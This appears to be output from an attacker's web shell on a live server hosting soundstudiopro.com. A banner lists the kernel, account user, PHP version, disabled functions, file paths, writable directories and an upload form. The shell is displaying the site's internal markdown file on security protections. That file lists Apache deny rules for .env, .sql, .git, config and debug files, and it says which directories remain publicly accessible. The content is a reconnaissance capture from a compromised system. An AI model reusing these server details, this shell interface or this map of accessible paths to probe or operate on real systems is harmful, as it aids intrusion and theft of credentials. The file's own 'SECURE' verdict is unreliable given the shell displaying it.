T.ME/BIBIL_0DAY
CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/private_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gositeme/domains/soundstudiopro.com/private_html/SECURITY_PROTECTED_FILES.md
# 🔒 Security: Protected Files & Directories

**Date:** 2025-01-27  
**Status:** All sensitive files and directories are now protected

---

## ✅ **Files Now Protected**

### **Documentation Files**
- ✅ All `.md` files (155 files) - Contains system architecture, database schemas, API endpoints, security details

### **Configuration Files**
- ✅ `.env` files - Environment variables and credentials
- ✅ `.sql` files - Database dumps and migration scripts
- ✅ `.log` files - Application logs with sensitive data
- ✅ `database.env.php` - Database credentials
- ✅ `composer.json` / `package.json` - Dependency information

### **Test & Debug Files**
- ✅ `test*.php` files (47 files) - Test files exposing system internals
- ✅ `debug*.php` files (12 files) - Debug files with sensitive information
- ✅ `spec*.php` files - Test specifications

### **Backup Files**
- ✅ `.bak` files - Backup files
- ✅ `.backup` files - Backup files
- ✅ `.old` files - Old versions
- ✅ `.orig` / `.original` files - Original copies
- ✅ `.tmp` files - Temporary files

### **Version Control**
- ✅ `.git` directory - Git repository (exposes code history)
- ✅ `.svn` / `.hg` files - Other version control systems

### **IDE Files**
- ✅ `.idea` directory - PhpStorm/IntelliJ configuration
- ✅ `.vscode` directory - VS Code configuration
- ✅ `.sublime` files - Sublime Text configuration
- ✅ `.phpstorm` files - PhpStorm configuration

### **Fix/Migration Scripts**
- ✅ `fix_*.php` files - Fix scripts that might expose internals
- ✅ `auto_fix*.php` files - Automated fix scripts
- ✅ `migrate_*.php` files - Migration scripts
- ✅ `create_*_tables.php` files - Table creation scripts
- ✅ `run_*.php` files - Utility scripts

---

## ✅ **Directories Now Protected**

### **Sensitive Directories**
- ✅ `/config/` - Configuration files (database, email, API keys)
- ✅ `/migrations/` - Database migration scripts
- ✅ `/task_results/` - API callback data and results
- ✅ `/logs/` - Application logs with sensitive information
- ✅ `/.git/` - Version control repository

---

## 🛡️ **Protection Methods**

### **1. RewriteRule (Apache mod_rewrite)**
Blocks requests at the URL rewriting level:
```apache
RewriteRule \.md$ - [F,L]
RewriteRule ^config/ - [F,L]
```

### **2. FilesMatch (Apache)**
Blocks specific file patterns:
```apache
<FilesMatch "\.md$">
    Order allow,deny
    Deny from all
</FilesMatch>
```

### **3. Directory Protection**
- `Options -Indexes` - Prevents directory listing
- Directory-specific `.htaccess` files where needed

---

## 📋 **What This Prevents**

### **Security Risks Mitigated:**
1. ✅ **Information Disclosure** - System architecture, database structure
2. ✅ **Credential Exposure** - Database passwords, API keys
3. ✅ **Code Exposure** - Source code via .git directory
4. ✅ **Debug Information** - Debug files exposing internals
5. ✅ **Log Data** - Sensitive user data in logs
6. ✅ **Configuration Exposure** - Database configs, API settings

---

## ⚠️ **Important Notes**

### **Vendor Directory**
- The `/vendor/` directory is **NOT** blocked by default
- This is needed for Composer autoloading
- If you want to block it, uncomment the rule in `.htaccess`

### **Public Access**
- All protected files return **403 Forbidden** when accessed
- Files remain on server for internal use
- No files are deleted, only access is restricted

### **Testing**
To verify protection is working:
1. Try accessing: `https://soundstudiopro.com/SITE_ANALYSIS.md` → Should return 403
2. Try accessing: `https://soundstudiopro.com/config/database.php` → Should return 403
3. Try accessing: `https://soundstudiopro.com/test_api.php` → Should return 403

---

## 🔍 **Files Still Accessible (By Design)**

These files/directories are **intentionally** accessible:
- ✅ `/api/` - API endpoints (needed for functionality)
- ✅ `/assets/` - Public assets (CSS, JS, images)
- ✅ `/auth/` - Authentication pages (login, register)
- ✅ `/includes/` - Included PHP files (processed by server)
- ✅ Main PHP pages (index.php, library.php, etc.)

---

## 📊 **Summary**

- **Total Files Protected:** 200+ files
- **Directories Protected:** 5+ directories
- **Protection Methods:** 2 layers (RewriteRule + FilesMatch)
- **Security Level:** High - All sensitive files blocked

**Status:** ✅ **SECURE** - All sensitive files and directories are now protected from public access.

CasperSecurity Mini